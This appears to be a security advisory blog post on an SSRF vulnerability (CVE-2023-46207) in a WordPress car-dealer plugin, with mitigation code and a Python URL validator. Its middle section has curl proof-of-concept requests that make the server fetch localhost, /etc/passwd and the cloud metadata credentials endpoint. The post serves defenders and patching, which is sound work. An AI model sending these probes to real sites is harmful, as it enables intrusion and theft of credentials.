Published: June 2024
Severity: High
Overview
If you run a WordPress car-listings site with the “Motors – Car Dealer, Classifieds & Listing” plugin, you should know about a serious flaw in versions up to and including 1.4.6. The Server-Side Request Forgery (SSRF) vulnerability tracked as CVE-2023-46207 lets an attacker make your server fetch URLs of their choosing, including hosts on your internal network, potentially leaking sensitive information, exposing internal resources, and giving the attacker a foothold to pivot further.
This post will break down what SSRF is, what exactly the plugin’s bug is about, show you real code examples, and link you to the official advisories. (If you use this plugin, update ASAP!)
What is SSRF (Server-Side Request Forgery)?
SSRF (Server-Side Request Forgery) is a web security vulnerability that lets an attacker make your web server send HTTP requests to any resource the server can reach, including resources that are unreachable from the outside world. An attacker can use this to read content from internal-only hosts (localhost, intranet services, cloud metadata endpoints), reach APIs that trust requests coming from the server's own IP address, and use the server as a pivot for further attacks.
About the Plugin and the Bug
Plugin Name: Motors – Car Dealer, Classifieds & Listing
Plugin Slug: stm-motors-classified
Affected Versions: all versions up to and including 1.4.6
Fixed Version: 1.4.7
Official Site: StylemixThemes Motors
The vulnerability exists because the plugin does not properly validate or sanitize user-supplied input in some of its AJAX handlers: an attacker can pass in a URL to fetch, and the server fetches whatever endpoint the attacker named, including local and intranet addresses.
A typical SSRF happens when the URL is taken from the request without any checks, like this (simplified pseudo-code):
// unsafe code snippet: the URL comes straight from the request
$url = $_POST['fetch_url'];          // attacker-controlled
$result = file_get_contents($url);   // fetches any scheme/host PHP supports, including file:// and localhost
echo $result;                        // and echoes the response body back to the attacker
If there’s no checking, an attacker could POST
fetch_url=http://localhost/admin
and see internal content they shouldn’t.
The SSRF flaw lives in code that processes AJAX requests. The handler and parameter names used below (wp_ajax_stm_motors_validate_vin, vin_url) are illustrative placeholders, not confirmed names from the plugin source; check the vendor changelog and the advisories linked at the end for the actual change.
wp_ajax_stm_motors_validate_vin
Simplified View
// Example: inside an AJAX handler file (e.g. inc/ajax.php); illustrative, not the plugin's actual code
if( isset($_POST['vin_url']) ) {
$url = $_POST['vin_url'];                // attacker-controlled, never validated
$response = wp_remote_get($url);         // no scheme or host restriction!
// do something with $response
echo json_encode($response);             // response body (and headers) go straight back to the caller
}
The handler never checks that the URL points at the intended external service (for example, a specific VIN lookup API). An attacker can POST URLs such as http://localhost/private-admin or even file:///etc/passwd.
Probe an internal host (replace victim.com with the target site's domain; the action and parameter names follow the illustrative handler above):
curl -X POST "https://victim.com/wp-admin/admin-ajax.php" \
  -d "action=stm_motors_validate_vin" \
  -d "vin_url=http://localhost:80/"
If the site responds with any internal service content (say it’s an admin page or an API the server itself can see, but the public internet cannot), the SSRF has succeeded.
Try a local file (only works if the fetch function accepts file://):
curl -X POST "https://victim.com/wp-admin/admin-ajax.php" \
  -d "action=stm_motors_validate_vin" \
  -d "vin_url=file:///etc/passwd"
*NOTE: WordPress's HTTP API (wp_remote_get()) only speaks http and https, so file:// requests fail by default; attackers still probe for them routinely, because a handler may use curl or file_get_contents() instead.*
Try the cloud metadata service (AWS-style IMDS at 169.254.169.254; other clouds expose similar endpoints):
curl -X POST "https://victim.com/wp-admin/admin-ajax.php" \
  -d "action=stm_motors_validate_vin" \
  -d "vin_url=http://169.254.169.254/latest/meta-data/"
If this succeeds, the response can include instance role credentials, which is why SSRF on cloud-hosted sites is treated as high severity.
Mitigation
- Update ASAP: if you use this plugin, upgrade to 1.4.7 or newer immediately.
- If you can't update, disable any feature that lets users submit URLs for the server to fetch; that blocks the attack route until you can patch.
- Whatever the handler does, require a nonce and (unless the feature really must be public) a capability check, so the fetch cannot be triggered by arbitrary visitors.
You can also patch in code by allowlisting acceptable hosts. A bare host comparison is not enough on its own: restrict the scheme to http/https, use strict comparison, and disable (or re-check) redirects, otherwise an allowed host can bounce the request to an internal address. WordPress's wp_safe_remote_get() helps here because it refuses URLs that resolve to loopback, link-local or private IPv4 ranges (via wp_http_validate_url()), but it is not a complete defense: that check is IPv4-only and a host can change its DNS answer between the check and the fetch. A corrected version of the snippet:
// Safe example: only allow traffic to official VIN providers (host names here are placeholders)
$allowed_hosts = array('api.vinlookup.com', 'vin-provider.com');
$url    = isset($_POST['vin_url']) ? trim(wp_unslash($_POST['vin_url'])) : '';
$scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
$host   = strtolower((string) parse_url($url, PHP_URL_HOST));
if (in_array($scheme, array('http', 'https'), true) && in_array($host, $allowed_hosts, true)) {
    // wp_safe_remote_get() rejects URLs resolving to private/loopback ranges;
    // 'redirection' => 0 stops an allowed host from redirecting us elsewhere
    $response = wp_safe_remote_get($url, array('redirection' => 0));
} else {
    wp_send_json_error('Disallowed URL', 403);   // AJAX-friendly 403 instead of wp_die()
}
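The same destination check, written out in Python as an added example (it is not code from the Motors plugin, the advisories, or WordPress; it is written in Python rather than PHP so it can be run and tested stand-alone). It covers the points made in the SSRF overview and in the allowlist fix above: scheme restriction, an exact-host allowlist, and a check that the address the HTTP client would actually connect to is public. It also goes a step beyond the PHP snippet by parsing IP literals the way clients do (bare-integer IPv4, IPv4-mapped IPv6), which a plain host-string comparison misses. DNS is replaced by a constructed lookup table so the code runs offline, and the provider host names are placeholders.

```python
"""SSRF destination check (added example, not the plugin's code).

Models what a fetch handler should verify before calling wp_remote_get():
  1. scheme is http or https,
  2. host is on an exact allowlist (or, with allowed_hosts=None, any host),
  3. every address the host resolves to is public.
DNS is stubbed with a constructed table so the example runs offline.
"""
import ipaddress
from urllib.parse import urlsplit

# Hypothetical VIN providers (placeholders, as in the page's PHP allowlist).
ALLOWED_HOSTS = frozenset({"api.vinlookup.com", "vin-provider.com"})

# Constructed stand-in for DNS. Real code would use socket.getaddrinfo().
FAKE_DNS = {
    "api.vinlookup.com": ["93.184.216.34"],
    "vin-provider.com": ["93.184.215.14"],
    "localhost": ["127.0.0.1", "::1"],
}


def literal_ip(host):
    """Parse an IP literal the way HTTP clients do, or return None.

    Handles bracketed IPv6, bare-integer IPv4 (http://2130706433/ is
    127.0.0.1 to curl) and IPv4-mapped IPv6 (::ffff:127.0.0.1).
    """
    h = host.strip("[]")
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        if h.isdigit() and int(h) < 2**32:
            ip = ipaddress.IPv4Address(int(h))
        else:
            return None
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip


def resolve(host):
    """Resolve a host name to addresses using the constructed table."""
    ip = literal_ip(host)
    if ip is not None:
        return [ip]
    return [ipaddress.ip_address(a) for a in FAKE_DNS.get(host, [])]


def is_public(ip):
    """True only for addresses a server-side fetcher may contact."""
    return ip.is_global and not (
        ip.is_private or ip.is_loopback or ip.is_link_local
        or ip.is_multicast or ip.is_reserved or ip.is_unspecified
    )


def check_fetch_url(url, allowed_hosts=ALLOWED_HOSTS, resolver=resolve):
    """Return (ok, reason). allowed_hosts=None means 'any public host'."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False, "scheme not http/https"
    host = parts.hostname  # lower-cased; userinfo (user@) and port already stripped
    if not host:
        return False, "no host"
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, "host not in allowlist"
    addrs = resolver(host)
    if not addrs:
        return False, "host does not resolve"
    for ip in addrs:
        if not is_public(ip):
            return False, "%s points at non-public address %s" % (host, ip)
    return True, "ok"


if __name__ == "__main__":
    for u in ["https://api.vinlookup.com/decode?vin=1HGCM82633A004352",
              "http://localhost/admin", "file:///etc/passwd",
              "http://169.254.169.254/latest/meta-data/",
              "http://api.vinlookup.com@localhost/", "http://2130706433/"]:
        print(u, check_fetch_url(u, allowed_hosts=None))
```

Two caveats carry over to any real implementation. First, the host you validate must be the host the HTTP client connects to, so pass the exact validated string to the client and disable redirects (or re-run the check on every hop). Second, resolving once and then letting the client resolve again leaves a window for DNS rebinding; the robust fix is to connect to the address you validated (pinning the resolved IP) rather than the host name.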
References and Advisories
- NVD: CVE-2023-46207 Entry
- WPScan Advisory
- Patchstack Security Blog
- StylemixThemes Changelog
Conclusion
SSRF vulnerabilities are a big deal and often lead to further internal exploitation. CVE-2023-46207 in the Motors plugin turns your WordPress site into a springboard into private data, internal APIs, and, on cloud hosting, instance credentials. Don't wait: patch now, and always validate user-supplied data, especially URLs the server is asked to fetch, in your WordPress plugins.
Timeline
Published on: 11/13/2023 03:15:09 UTC
Last modified on: 11/16/2023 23:47:25 UTC